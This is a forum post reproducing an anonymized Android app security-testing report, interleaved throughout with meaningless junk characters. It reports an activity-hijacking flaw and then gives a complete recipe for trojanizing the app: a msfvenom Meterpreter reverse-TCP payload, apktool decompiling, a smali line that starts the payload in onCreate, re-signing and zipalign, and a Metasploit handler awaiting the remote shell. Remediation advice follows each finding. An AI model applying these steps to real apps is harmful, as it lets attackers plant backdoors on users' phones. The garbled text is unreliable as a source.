) Q' w+ X7 e; [; B9 L$ U% }7 V; }3 w2 m, q
' ~9 Q! a9 ]* E* Y9 o5 t0 F% H5 s. S* `, G4 i, \' m
, e5 d/ ?! t5 g% p # J8 Q, F; p5 i) p$ j4 O- [6 A

7 r) D z9 t% }6 G J 0 d3 M5 j( z, ^% h, x   . E' ~* f1 d; Z$ r R4 s ) K1 e: \) r7 ~+ h( {

6 C/ C% \: R! c- p( u5 t4 c/ M ! s L: x1 m9 v2 q! u

) m/ q( y9 ~" w: s9 ]# O; m - c _/ K g; E9 ~ 1-2 测试结果 , x1 c! [/ i! N; P2 L( U! _* Z& g: n' i" {

$ D0 \- V9 [/ @/ T 4 ]$ a( k1 `9 h/ W5 N

" N& N/ Y# g& S% u4 E( W4 R5 b( e) e# ` M   + U/ c/ e. @5 B* o0 M0 j! H3 _ P( B7 M) J- c* W& u- q

8 E" x; B& H# ^; \( I; t4 D$ {* Y

/ E7 O$ {; U4 a: r2 [* s i2 K: _$ A* v* Z# c- G6 F; j 2 检测结果                    : V+ g- c- h) r- V! s1 @4 Q- @ ! A* N. I: D p9 a6 M! X

. ^9 e: @' w- }8 v ! Q! u2 \, A: m; F# e. c9 P3 F

9 j: Y2 ?! _1 \) O( Z i- v7 W/ `8 l# x, s* o- Q7 K& _ 2.1 某某某 5 s6 `8 l+ ` p 4 d: A: u: N6 n) c7 A$ C8 ]1 Q) \

' e+ u) d( \% O& M" [ % i l. f# s2 h2 d h( M

" S3 A9 u# w" \: K( ~7 p0 y 5 W d6 u7 w$ f1 G' W! { 2.1.1检测目标 . q4 C U2 w# ^6 Q% e% b8 ~" V 1 ~6 |2 A! [- B( ~6 [

1 M' r: @: a# {' R6 q) H# E# ]( q

: s" {( U5 N+ w $ u* M6 X4 J( D9 i5 _; X 目标地址: 某某某某某某APP , x- Y A2 U. P% w9 m, D1 I* y3 W i$ S7 k

0 L6 K# V6 ]1 Q! c$ [2 o ( H# \$ y$ Y) k. }" o \

6 Y7 }' Q+ R& E4 q/ Q8 f - {# y* f( l( t" z 2.1.2检测结果 * J) E! C" b. ~) a! E - ~( D, c3 @, o

' @5 l6 ?4 a# d 1 e+ ?+ A* X' v& Y( b5 I

' e" m2 p8 }+ j# t, }9 V v ' S2 V; Q1 [) l" r$ s- ` 2.1.2.1 6 v# k2 x! W( y8 S& `0 H$ x5 a) H5 J* x0 ~

$ p8 B/ X1 A" c4 x8 `0 C6 P8 @% e+ k 7 q, c" x! `; M! z4 d! k" w

" |: }; d2 `& T6 F& \ . G) h- v1 Y3 i# f1 L 漏洞链接地址:某某某某某某APP ( S9 ~! o( [" v( j6 T 3 |, O( Y! _9 n! @

; A9 s A7 M0 u6 U1 E- v& P2 a + _4 E; W$ A, m* R- j1 Y% a

, e6 |4 @- C, m; G" \1 L2 f $ m: L5 u) a" X7 j3 I   # {( l; E: n( R& `; V 8 v/ p: X* r/ U2 f$ V/ A

3 c* e! r& B) N, f 8 G; N: F; Q/ K V& ~

: [2 F. G( j4 h 3 G- }- ^1 X' `5 r! o4 C* k2 Q! m2 \ 漏洞分析及取证: 4 a% z" E, z5 I ; x8 {, z1 _3 \* j

1 |8 M* J) w3 Z- t4 n5 ~' g) N( {# p% F7 K, i A

6 i# E/ m: D: \/ n R! B0 O * B& w7 a0 O* n" R) {& D9 }                  通过androidkiiler反编译,发现app未进行安全加固, Activity com.minivision.cmcc.activity.SubActivity可被劫持,复现漏洞如图: 0 `4 y' H& S! ~; ?# E ! T8 B8 n# N6 i2 P: _* S. R

' l) e' U' f+ U7 ?+ d7 k5 w % m: E0 m/ V6 x/ K( ]3 e% d# l

$ e2 j0 a- i1 u# M. d: F6 Q9 r* v+ \& Q9 x5 u0 J( |      # h! u6 k) f# e) Y0 ?) Q- d7 l. }6 D9 U; }

) u6 p% A5 s: \ + \6 e# l: J$ ]2 k

* F- e: a: L: ?% I6 ^5 K 7 v2 ^' [7 t1 x& j. k& ~. S                       ) X+ q& I* b) w3 W' g2 R ) g& T6 C' h1 l6 _

& z X/ N0 O4 X: }0 L! y 8 I2 R/ |$ [* V) K, f

& w5 I0 a# D6 i* E * G6 h1 u; l6 h, _ 7 c- p7 [# | V$ C9 ? `! Z3 z; R 1 O, ~" _% X8 P- D% v. J

0 r4 g- V; \; [6 T$ [' Y' [* [, l' G " f# I- X/ X3 l0 }9 F

' t) B' f8 o f 3 {9 j: P) N2 c 0 ~, p* M4 G+ T* @. d7 T0 I0 G1 X8 w$ s/ }

0 J N: ^! L: s5 Q/ p: j! g9 C3 X# s) ~% Y- N2 Z: s6 S

( I, r) b$ I& U- ~# d $ `! C7 z8 a8 y 9 S+ y3 W* ]2 o4 L/ X$ T + l Z/ G; t2 F% e! k5 a9 o0 X7 K+ n4 R

" {) _6 p$ j" T$ ^; F6 Y ; X3 K o1 {8 R7 i1 n1 ]& p$ P

$ L9 S9 U' I& H2 C9 R: z& r$ x: A. j! k" Y 漏洞危害:高 $ U/ G9 u. E7 ~' B6 r- O ^$ j6 }8 f$ f$ H4 d3 U2 ]8 ?7 D) Z- v% R& q! ?

* x" b( d% A# e7 @% @ * _ h' i2 A" x& `# [( b! @" c
1 i, x8 ]! J0 e+ E 8 O9 g6 ?5 z4 r) `( H7 D n/ h* k1 F: e- n- [8 i% W' M8 a; S0 V1 w' w H5 l9 N) E. x; z8 T: f9 w) u7 ~ L9 f" o3 e# K) A) Q2 D; k7 H# c2 a* m" t, a( c. ]$ |9 U& A" B$ F$ i7 }$ W G1 T4 {6 o+ J+ w* K/ D. I7 x' c: Z3 Q. Q9 G* c# z) d7 R% {% W/ u+ t3 A$ l1 M% M$ {4 B5 n8 L& R) i) d# j) l$ [: s8 R/ o2 F3 G' u% K0 }) b! C& A4 ~' D4 o6 U5 t$ m6 i) y4 w Q: D2 k: ~( `! s0 U) y7 y. W8 e! {: B0 G% K& m, h7 U& x' x1 U0 I( ?0 s- f& j8 V8 n$ |2 g1 ]3 [9 G; [: v( [3 ]! U- R( R1 ^1 i, X r+ T- ^$ r. C6 o, n1 O, t$ p7 N! l2 `3 |$ H3 C1 o7 ^% a% N8 c+ I' ]8 v% F$ U
+ p) ^0 f9 h3 G7 V9 z/ {5 g7 w. L4 t8 w% I7 E

6 m8 [: c2 b' H3 s( l8 [1 m* C ; j1 }8 F# ~6 A 严重程度 ' p+ a. K2 w+ \" Q+ h. } 4 |4 D* ^ _. D, P3 r$ R

) t D* A) Y7 _! [- t # Q" `. T. U" P+ T1 E6 I 		% {$ ~4 Y% x0 _, ~* O. X' \2 |$ F% w; ?9 |3 _5 P0 [" |; D: B1 P

9 G# l4 h! H3 i+ K& G8 ]. {! S8 o1 `' q2 e( n' o! H3 H2 d 8 f' ^6 x, g/ l. f' H% J ! T, }$ j9 l" c( F5 K, w

/ c/ H8 ~# u4 l, q S6 D( D6 n, k 		. [$ }! d; }8 R$ F0 d# ^% m7 U$ i. Z S2 L: O* E

7 b; H0 {: B5 K+ p! n3 ~ C/ L / o$ I* K6 k9 Q7 ?) f : R: Y" P1 Y6 h' q: o t# ^7 M& L+ W6 Y- F

0 l2 c1 J5 \3 ^# n3 q X) U: D' X2 D 		: T% b1 p8 ^& \# D$ Z$ X/ F" n5 u* D& |! o n5 |- [& z1 h6 C

9 c2 K5 Z$ r" ` 0 I: J! t! J# z, V2 k $ W( v! e* J: i7 O5 G( M. @ 7 K* n& t5 p3 k; [3 G3 E* K* j1 W& Y

6 [- d; L ?% q' Z) a( ~# a 6 I9 E7 _" N3 _- v9 c 		% w# z) I9 F) O* m q" j $ q% M2 k3 R. J7 J1 n

& a! G* `9 i! Y5 ~/ u- } _$ n, r9 s2 G4 c, a   9 D* o$ S* U& p9 d ! n! i5 R( r2 h* I1 z5 M

2 G- ]1 o1 Q& G0 o0 z- |- E: W+ y! N9 a% p1 t$ u3 B( S 		7 S: z M/ U" a" F; K) ?: [% O3 L; z0 d0 t8 n1 H+ B; c+ ]! K' [

7 g/ o. q0 o* W* W + _- l U5 Z# E0 \+ w " o( I' T5 E x5 h$ x9 d/ I5 o ) y* ~( ]. k% ~' V. a- b- j

: g& o7 ~( \ _9 r4 T( o. n' N+ Z) i+ M( Z P# z$ h- l" D- K r 		- E' V. O$ |- U( u) f6 U0 d ; ^5 v: x- M0 G) A2 l

$ r/ m. n9 R) H4 J6 e : j* b' Y, W' _; x( v; y   " m' q3 b. \, o: Y4 N. n$ V 8 j( Q& M( B/ T$ n

! G. R/ G! `$ Q2 x6 S: W0 m ) [0 b& y7 W; L) d
6 X* h! }3 z3 r ' I) ]5 l( k3 c t) d+ k1 [4 z. A
: w' h( b# e2 D( E( L+ t8 } % i O" s9 ^. x# b" q

4 q O1 T1 T4 _% E. C 2 i& ^. @6 [# |. e   ( y1 E' N5 ^- Y. ^9 D# q* q: j9 B/ O' _1 W5 `. r

: N" c; ^ x8 c 9 P5 K5 E! V5 \

. ?- i! n& L' z: O: V( { * F1 m, y9 s ?; Y6 `+ B 修复方法:在 APP Activity 界面(也就是 MainActivity)中重写 onKeyDown 方法和 onPause 方法,当其被覆盖时,就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的(触摸返回键或 HOME 键),如果是用户自己触发的则无需弹出警示,否则弹出警示信息。 3 v' v1 M# `3 S1 r' x4 } 1 P1 O$ p1 j* m8 a

: H4 H+ ^; t: h( p* N0 _) J k: l) w4 a4 `0 p# z. }; F7 D

" I" [; V- X; d; ?1 E' H9 u. ~) y3 {% a V1 l           6 S$ Q% n4 ~3 }, |4 ^, ? " s/ {5 J$ |+ r% e9 ]% G$ f

& c. T/ H8 o3 ^5 c# G( I6 \4 a0 B" v" b/ X+ N/ m

3 E( o/ g0 ~: [0 ? & n) }( u) u0 J: X- C" _   $ }# {+ U. @: v6 D' V! Z" G& v* m8 t ; e( y6 s) P3 Z* ^0 e) C# u

5 V6 _5 w: [" r5 w. \4 Y1 y; p ; _, g. K' x; R" v3 M7 X

- C* q5 ?2 m8 @1 f ! q+ l; l- Q' C* o# O: a 2.1.2.2 J* c6 O$ x$ [' N/ n7 O; E& V$ x+ W% q8 M/ }4 s1 f

0 N1 q5 D4 x s $ W& X6 M9 f+ o( J) q% f% u5 [

- M) I8 u# n: A: u; b, x7 W " v+ X; ]0 X, |4 ^9 i 漏洞链接地址:某某某某某某APP # B7 |4 G1 ~6 I" k, v9 F {. l0 H) W) r( }

/ @2 p4 I) f9 V 8 a2 e* }* `8 V/ O* f' G' U

/ j+ Q; ]7 Y6 q# j 8 v `! x0 Y. s+ i! T+ u! r 漏洞分析及取证: + P6 q- N, {4 n- G# S7 Z 8 U: I$ Z O& z( E& @+ S% G

% H3 z. h, z: \3 Y, N w 5 l- O* f1 P, X

' ?; t# _+ h4 R: D" V. g/ v, I3 V' v8 l1 T! i                  通过反编译,发现程序未加壳加密,可直接反编译获取源码,经过测试可修改app代码捆绑木马或者植入广告等操作,复现详细方法如下: 3 U7 e: E' U% L9 T1 G, ~( {" Y. t+ u& |! s

* j' L. o! m% c1 w$ P$ c H5 I( t+ j& U# S Q

5 j3 _3 H4 Q+ Q+ t( b : g4 o: H: J R! @5 @ Metasploit 生成木马 apk . Z7 o# ?8 l! j & d7 S5 `8 E6 j( x6 u- ?

% E; D5 K( p' q/ \1 M5 K) \/ [' z: {. b# x, ~% G

4 s5 h) t' r4 t1 q: J 8 E6 F6 Q6 K8 W: K" R% j0 x2 { msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk 1 @& e/ h0 {8 z6 t& }8 ` - v& g) J( z$ l7 m- K$ A5 H

8 I( U: P8 y' I7 l. V 0 w/ l; x3 G, {; m: D- b

9 `5 |; Q$ ^1 q% e1 s8 e$ j5 ^' h2 h: {1 F7 n: t6 V 反编译目标apk和木马apk 9 p9 S2 m8 V- d$ V! N / X, n2 R3 |1 |. s1 o4 M2 }

9 h1 N: S% \% n. L- A 5 M! e7 g, }! s6 H1 f% y4 |1 j

. w: o- x$ T/ q2 V 9 F8 q0 V7 i/ k apktool d target.apk
' m- M4 D3 e" R1 _* ~ ! v; I- Z0 U7 c& K8 m apktool d cockhorse.apk 7 w+ e1 Q- x- s! ^/ b ?1 C/ U1 L( O3 a

8 H3 i( |+ |0 h, \ c ' E% o1 S- \2 ~* Z

F9 J. m& d6 E/ n# A2 w+ N6 S' {, Y 木马 apk 注入目标 apk ( l, M, j6 k, V) O e, [' f) z. d, a ! Z: _6 O0 ?+ ^

% R; I, z- P; v$ L! f8 ` " s- `# B3 @" F) U7 x. K

! Q* ^9 U9 |7 _$ |- v* |3 Y9 }% w3 t5 c+ U! E 在目标 apk 反编译生成的文件中找到启动 Activity smali 文件,并在 onCreate()方法中添加如下代码:
; Y7 d4 X$ E& K: { + k( F x, ? z1 X) m3 w" ` invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V / X7 I3 J& k) N$ R1 n: k1 @4 ^ 1 ?6 V; C& W n) d9 O# c4 ^

( B8 X {5 { T1 R ; r4 Q$ M5 b) E$ H8 Y4 x+ v: H* `

# }! V1 D5 d2 w& _! |6 C3 C1 K6 \! Y6 ? 将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中,去除重复 4 W! I. @: `( z4 V2 \) k $ {. w$ _* h! ^: X. [ w

' b5 H* i4 n8 W- r. g9 P5 Y4 F! M: | m8 _9 p# ?

9 X7 u4 x: v8 ^- G' W 5 G' S6 l* K6 \ 将木马文件的 smali 文件放到目标文件下,例如 com/metasploit 文件复制到目标文件 com/ 0 }- v0 ]. q* X$ y ( W1 w' p4 ~- s8 T5 L' S

8 u! `6 h0 S: N6 B1 m0 {" c0 ? 1 X2 v0 V; w9 {1 U6 j& N5 q6 R5 \

1 c1 t- t7 ^7 {0 b( H# x& Q2 D: q& b* j7 x3 ^0 \2 C 回编译生成最终 apk $ @* R0 F& ^ X% L+ [* U $ V& Z& U( i; U- J7 J/ c! m

+ a8 ?5 } |! e9 h9 Y: V * R m D4 h1 M# m8 E

) }* U8 c' m) D2 O - c5 ^6 ~, W( e- d4 I( H7 ^ 重新打包 6 l( T* p0 g( o8 J" V% ~ Y( V& V " J0 X* m3 f# o( ?

; Q( o) Y+ m6 `7 J+ ?- N % E7 R: B* m. s) u( |6 N

% Y) _/ l* Y8 U) J, C5 ?( _8 P9 Y, Z l+ h5 L6 c8 s: L apktool b -o repackage.apk target_app_floder " i0 n9 q! t& R; O ! i0 }5 q. C* n/ I& S

( ]+ M, p1 L$ ` / }3 J6 s1 Z! A8 C T9 W6 |: \7 f

0 y6 G/ k2 H" \3 F , _. [* R1 a6 t3 q( c 创建签名文件,有的话可忽略此步骤 % u2 X! n8 F1 W+ w5 z2 y R " \' q6 [6 u! j

. D% e1 d3 J" \ o; c3 S3 f7 t$ T. H2 q7 ^ n m1 x5 N! q

: {3 R* x( [' r3 l8 p! z7 u- E - u; W$ s- ^. [; Q: t keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000                / X( R- r1 E& Q% @7 |& v- o5 o; x1 o% B

+ i! o! X' }% G' p1 h8 a6 m U : d+ ]( o* Q$ r4 u6 c$ D

' R% ^/ R4 F& M& z% L4 U* B + g8 A- G# I( \1 _; r' [. G3 m 签名,以下任选其一 4 ], B& f. B4 d4 P" \ & G7 N0 H) n5 k

+ M8 V& o7 j$ n( d3 R9 @6 x( A: ~/ k$ U7 W; V" D8 B2 ^

8 T, q* B% ?& ^9 |6 z 7 T* P* r' X& C: T! _ jarsigner 方式 : N" Q$ M" s) M, `$ d 8 W" F% w; F) Z1 U% R

) O; r& _1 O4 ^- h7 C3 ^* c' i$ _9 b6 e& f7 Y7 X: R

, M. i% F: x5 ^; a; e2 j c6 k Z X2 l' e jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname - f+ B9 H: w( o/ D# X # D8 ?/ q) ]+ s1 L

" V" F+ w$ \7 r/ G. V% M. @1 Q" E $ j+ X) {& z% w: K5 ]9 o& Q# r3 z

' J$ ]6 C1 B: |! N+ E" u2 ?4 c. C0 M/ `% _4 u! j8 ]7 K apksigner 方式 : i" h# P1 [" N( w, }9 J2 T% U 4 k0 [& a" h& y1 M1 q: c# Q. I3 D0 {

8 |4 L& g1 \- c( {) }6 [! G " @) S& j4 U, I7 ?/ l2 Z& L f

1 s1 f1 u6 a! v6 F / h" ~+ r% x9 X apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk 4 y7 d# W: @ ~& h* ] 0 U7 \7 f# V' ?8 I

0 g2 ^, a2 q3 ~0 e6 W' C Z+ e : V. u& `1 P/ C% G

( @' E+ O/ e8 z' f* M. f : e7 U6 d& K: f; F7 I6 N" G 如需要禁用 v2签名 添加选项--v2-signing-enabled false 1 Q/ K9 l3 T% v6 Q) ~- N 3 ]% d, P6 v; I5 Z; q, A

7 E8 z$ N# W, ^, u' q C , v7 o' ?! h' C0 U

2 A- E; H0 h( l$ M0 L2 z/ f+ n ?0 }4 d" X( b. P8 j) N- N; a 验证,以下任选其一 4 R5 u4 E x) K) p9 T6 l) ` ) M4 _1 d2 U! g) w

" e: U, N. d/ m4 n$ Z O8 _ . ~+ q7 a- p+ v$ R2 G. j2 u

1 k9 x' T7 Q6 Q9 b0 s 4 Z) ^! G' @ `3 N jarsigner方式 6 x% H* i- N4 h# N, F2 f , @' Q' a3 G3 S1 S3 T

3 h$ E" R; C: k1 O - ^: ^. p( P# L* x

, t _( {* I& V% R( N9 U( k; o ' h9 d$ [9 p& t: H( l; R$ R) B jarsigner -verify repackaged.apk " T2 V# s. X) `7 o7 K & m/ e9 W3 f) p1 A X) o _

/ J% m" K8 c) V) r 3 X, Q6 P! j9 F9 m6 d2 p

; ^: b3 t W' R. \ . r, G+ C6 @! M0 [ apksigner 方式 & _$ O' _6 \; Z6 p$ C9 I: x+ R" i4 q0 Y) V0 x8 m

4 W) [$ ?. R$ i; m7 k4 h& \0 ^5 I - z0 J( Q4 n1 C7 b

& B+ t. g; [, E( w; C7 {" k' \ apksigner verify -v --print-certs repackaged.apk ! [* f* t. e- Q r! r" D% ^! v # |) s( G5 ]9 J9 ]9 D

! a- @+ X7 e8 S7 B9 w 0 b- H8 m) y8 o% T+ B

4 ]% Z3 P% {6 b/ C3 p( s) p6 x; z 2 L6 _& L: b0 c6 y. t keytool方式 & h0 \) E; h. V* s - ?% j# W/ @8 o3 p

( T2 B7 S* d! x2 v8 I8 z6 t9 S 9 P& [6 G T: }. @4 n, ^1 g, f

# P% E3 M- Q6 [9 n a ! G* c3 V" {9 C/ Q- B2 p/ E/ f keytool -printcert -jarfile repackaged.apk {+ V+ x& O( {1 ?6 A$ X/ l, U" @ , r: t3 Z T4 D- b

2 W5 h" Y$ U% u/ @, ^9 R( J) [( ~% h: h ]& q% k$ d0 Q% E

B5 \" D- L( @; { * o- F$ X" s# c& v( w5 M2 B 对齐 7 Z( ?3 \' A; w1 F/ I% _ # D% ]0 q+ Y2 E! x6 B) u P

) x# \6 H6 S$ x4 G& d + R+ E- t# {- o) Z

+ J0 @. S$ V% _0 n9 {( Y5 q. A 7 G" h3 x. e# h) E" `* G 字节对齐优化 1 _5 O# I' M; E% l! x( a* e 9 i; v/ [5 r9 [8 X C, W+ }

5 }. R8 N6 g8 e. p3 F' m 9 w& T% j1 T! O+ g; }

5 h0 ]* o% r% I- M# ~$ f $ @6 @* N n! a, j7 [- U' h zipalign -v 4 repackaged.apk final.apk * q+ n8 s$ G5 t8 k 7 w& b3 ]7 Y% k5 V- [( @( T5 _/ ]

" _/ X' L" c; e: S+ N$ P5 n! I6 H* L5 y) C5 G+ a8 O9 \, T1 S- f- J" g

, r0 M/ z0 }1 z3 v% ~# N& K8 p) u# }/ T* i; ]. T 检查是否对齐 8 z: D0 s6 ?& L' a- m: F; j5 c' C& f: p h

. l% N0 l" ~4 ^2 L$ f7 N 5 X5 z) ]5 G$ D3 w/ T4 Z6 ~5 y# I

* J$ a& i1 B8 ]6 A/ p" T( P 3 o8 b7 f0 @- e; a5 j* `! S( { zipalign -c -v 4 final.apk . L+ @* C$ b5 i" d+ r1 p6 K7 C( K. q0 H

. h3 W# e5 |9 l. I$ @5 } n7 t 6 M* F& p4 J- v4 t

$ `8 H5 K2 g9 N h7 \9 n, H7 [. y# m. |' j; i 注:zipalign可以在V1签名后执行,但zipalign不能在V2签名后执行,只能在V2签名之前执行 : ~9 w% T& }5 f/ A8 { P4 B; n) M- u* T% G5 m2 _0 c$ K

) z0 G+ i( M* V" D! j2 G * p5 M3 a# y" Z% z/ b1 Y% V F; S$ c

$ T- L! X" U* @7 y8 ]5 q- e A, n+ s$ |5 z3 O' c, o1 N: H+ T 启动Metasploit控制台,配置参数等待上线 1 X: B! c# t) X3 _1 u7 w! }6 B* y& N3 ?# s; P" r$ p2 x# V! z. ^

+ i" ?2 G E7 C1 j) B . c* O( b' b( q" ]

. U$ ?0 C+ N. P ' ^" s$ L* C" C8 G- c* z0 E2 [ 在终端依次输入如下命令 & g' S7 c( p9 K) g' ]( m : |( ^; c5 J* C- w A% c. V- N

0 x/ C% r6 o- ^; W. Q$ z* P. l k

+ _7 K5 d0 t. C: ?' W6 l) _+ s6 w, n3 r& T! {& r7 }9 _& U msfconsole 0 T* O2 e6 S/ O6 B# }, g - {) S' L3 q4 A& T

G+ u o1 ?8 G4 I( k) ?1 r E9 o6 r T* G

@) y: z( k5 h8 P4 A; \8 k / B) e! E; G: O: b2 T7 k use exploit/multi/handler , ~3 P3 G- R. q* d0 n ! V. I, U0 h& c Y, e% ? G; D

' C2 x, b8 p2 ]. I' \/ E& w9 }- T + U, k R% U; W# Y) e' y

' `; u- J( A2 X8 T2 ~ 6 R0 p7 p& I3 a! x0 o: c; z set PAYLOAD android/meterpreter/reverse_tcp # G" K* d! U2 ?0 ?/ b O9 E * M2 Y: C8 I2 h" r6 `

' d/ T7 @3 v* z: G( d Z , N* |, }6 y, q- W

( W& z# ]% i }1 X: `: u% I) B $ P0 Z5 ~- `7 O" | set LHOST 192.xxx.xx.xx 8 g* ~. n( f4 U' g% u$ l P" K- g7 V2 i7 f9 z

- }. R7 @* a: y& L8 S0 w% H4 j" [& X9 P* L! V# ~; z* J

- z8 ^1 p! H/ Z. F9 A& t6 ?( k) X+ p$ ~0 H2 _ set LPORT 4444 " c$ j0 J1 v( h ' c7 R7 K/ |: C) n

' P+ _2 X# O4 o # G1 I" U7 t8 }- p. o% i. H

4 Z! e% M( \% V+ D7 g% G) m ) @' U; |9 f5 }3 j2 D exploit 0 |! I R6 X5 a) h* D; }1 {* W* T3 r( t% O/ x( i

' T" ~/ T# ~8 x3 X8 @' t+ f0 d9 z* a: k0 Y2 Y( J7 L w

6 Y+ K/ g3 P0 X) z ' t% s' s) E; z( [6 t. N( { 之前我们把入口放在 MainActivity onCreate 方法中,当启动目标应用进入该界面,就会连接成功,如下图:               " d* }* }6 }8 V7 {% O! j6 d ^ ?+ o1 O* L0 w# X8 `+ F' }! `

; k8 c- p6 f E+ v- \ / v0 |- t0 Y. h) E" g

+ \* Z" j2 p! E& c( J2 C 5 X+ {. x% M/ X1 ]% _1 C7 P I 漏洞危害:中 4 M8 e0 U, b! q; w9 ~% C" }* |, {9 l- f

( D& p1 @- C% V7 i- S $ c$ p5 P; x1 t9 t
- a2 B x7 i3 U T0 B # l# Y n% t8 i. t0 \ 8 _& ?1 b3 R: m 2 B& q7 F; h8 H; X# O" v 5 i2 }$ D) K; n0 Q. i* C' V$ S& X& C4 {, s4 y$ I% h, E/ j# N2 ? M: c3 `: `2 P, `) A, ]' R2 T0 b4 Q a- D; L/ g9 \& j5 }9 ^9 u" H% N; O/ P( _# [9 Y6 t% R% Q; M* `% i3 f. K1 H1 S4 |1 e* S7 L5 \! v H: w- r. W2 N3 u( w5 F6 f7 c9 x, Z ~% W5 Z- B \; {! M7 z! |$ [1 {* B3 q y3 N6 a/ ~! Q! R3 J4 J( Z' O8 d2 O8 o$ o4 R( K1 q. b- |. X$ _- E8 t4 h, S6 z5 O" z* n& p' c% R: q5 Z+ r0 [+ d2 u5 [4 v/ w) g( ?9 \' D3 ]) m% x0 w1 l2 V- _/ q- X' t2 Z0 ~+ k% H# R. k: t% W% L* O. a! l" d5 W6 K. d7 g* }; [0 i; ]; j+ \) S0 Y$ K+ b) d! q; |+ F H1 ^+ V' t* X7 e- Q& z0 N- @$ {& }5 U7 `/ @) T }7 |+ s
8 w- o" t) l7 q: V# k- T P & G: d/ Y. R+ w5 o

& c) W" i" j4 k I# Y* j 1 r- r+ w8 |" N5 h( J: f 严重程度 ; \; g9 z. S7 L# f3 B. r4 v& y/ i3 V& b/ @

2 P( q2 m3 z) p% s 6 S! j3 x" S9 M7 [ 		% Z m! O L7 [2 X+ E7 H5 [/ ~% L( ?1 S! ]( U- S7 i8 }

1 F0 n0 a3 O( u6 ~ 3 h0 U( a) o6 ` $ ]4 b1 q4 j. p2 k l+ T$ _6 L2 v ) }: Z8 T$ z1 p

% d" D' F0 m9 O9 D7 e* o, |. }2 L4 v- i& i 		4 e) q4 O. z# Q5 d/ @0 }+ e" @" c3 h6 b

+ ?0 M! W( X' \& ~; \$ w' A2 r' s: ? 3 _) }' W, Q" R , Y: S: `4 |8 W6 W! X5 n

0 |5 c# ^7 \3 f( I' F$ b4 t! k) U2 a$ L; `5 b5 ]+ e: E) x3 ? 		# Y, {; ]: B& L6 y2 Z4 p$ p& G

* {) X3 ?0 X' `: `# g; ^ L( q9 d \, V8 _& R: R' D / A* y' w) K, Y( V6 u . {# s- s& v- f

' R6 d# z) t+ `. h+ B* E* t" O/ I' C& k+ h" P 		: |- [+ x* Z2 K- R$ P ; I# k2 }1 b) @! L9 \: H5 ]# M7 i ) F0 R X! @% t" v! o! j) q+ I* p* g& N$ D

6 y* A. i, G* f9 q+ t) _* _5 @! }4 p0 I4 O$ H   ; K: ~5 c6 @% v* V& q+ s2 E( T 0 z& T, Y8 C# x* ~5 {

/ q/ J$ [! O# G- P; j; c' W& L& y7 }0 p/ q" Z$ W 		0 @7 u2 _5 U# l1 Q' a; u" \% ^- r3 q

. f4 a% z- w6 }) T0 E- @5 k& J$ c9 \, {! @- p! A 9 H+ I6 \; ?0 W& k # o% Q8 q |: \9 F; `7 w

0 n2 e0 N F& |7 Y* A" D( n) U3 o+ W$ Y0 S* w 		2 \8 @2 H2 e* O 0 X7 \5 I) Z7 M1 j / [, Y. s8 _8 V; m& E# b ( \7 _' b4 ^- A

4 N: Y2 V: O. t. D' P7 H1 Y- q 3 E0 l/ I0 G1 N" R4 U% F6 }   + O3 x0 _' }0 m% k ! f) F' n% P% X" \

8 F( `4 \2 L% _$ p2 g6 V% e . d( M: {' T6 r% L, v
& p' e0 D4 |; k4 A0 A" ?" M 6 D6 C# W9 G$ ^" ]0 D, Z
& [( M* i. X1 u) t ?1 B; X- b, P- _" c r

- ]* d0 k1 K. p! j) l4 c, Y* h! a. N' t; V. Y( C! y9 N: e) E! e   ; l' X* y+ z$ e$ f# N1 ]: A# ^ 9 X& F. S' B" n+ F- |+ z, X

3 W7 w6 r! H0 I! G% U3 D+ h6 V ' w; p3 @/ C4 k* v( {

0 x7 b6 P* K4 [ ) w7 n; w/ A4 L! W- j6 u! S 修复方法: 8 r3 A7 t- m! A) } 7 s6 ?7 |4 c! ~5 W( V$ s

f* g$ {. { |* ]; s' h1 a7 Q5 A/ R. j

( J7 X4 g1 v! W/ E0 D! S4 \) j/ z5 \( ]1 Z1 G; B               1. APP 启动时应做签名校验防止二次打包。
9 `' H* h( x" S $ ~' r- c, d' U; W5 z# ]. b 2.建议采用客户端、通信和服务器端联动防御方案进行安全防御。 * A- w; x3 k& ^' e8 x. G ( K9 T4 {1 Q; i+ A

# {0 V0 t- j/ Z1 X; X- b0 R 6 ^/ B1 m! a1 I( X * ^( S5 |+ o, b! H$ U0 W# ~0 u# j, A$ v% T) f+ k' k4 B; a/ |+ M

6 R7 M+ R' @* `( X0 `4 |+ m * b" ]9 u# F! f# d5 ~   1 O ~+ ?& W4 g8 N8 ]- m+ S5 W g3 L& O& b9 q* z

, N# X8 _$ G6 d " n5 h1 Y5 K" i! V0 o9 w" `3 l K" W - w# d% z- ^/ ]; t ) O6 t% R" g( Q3 ~

7 q3 C g' Q& c5 [5 ~# e! M 8 l: ]) w! ]* ~/ G$ q
3 o6 \2 \# S+ F5 L ( S+ N3 Y; G% ]# I: Y+ h

2 M6 e$ f( u1 F) P* @1 t( b 2 e% n) U- ]& T' \4 s
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表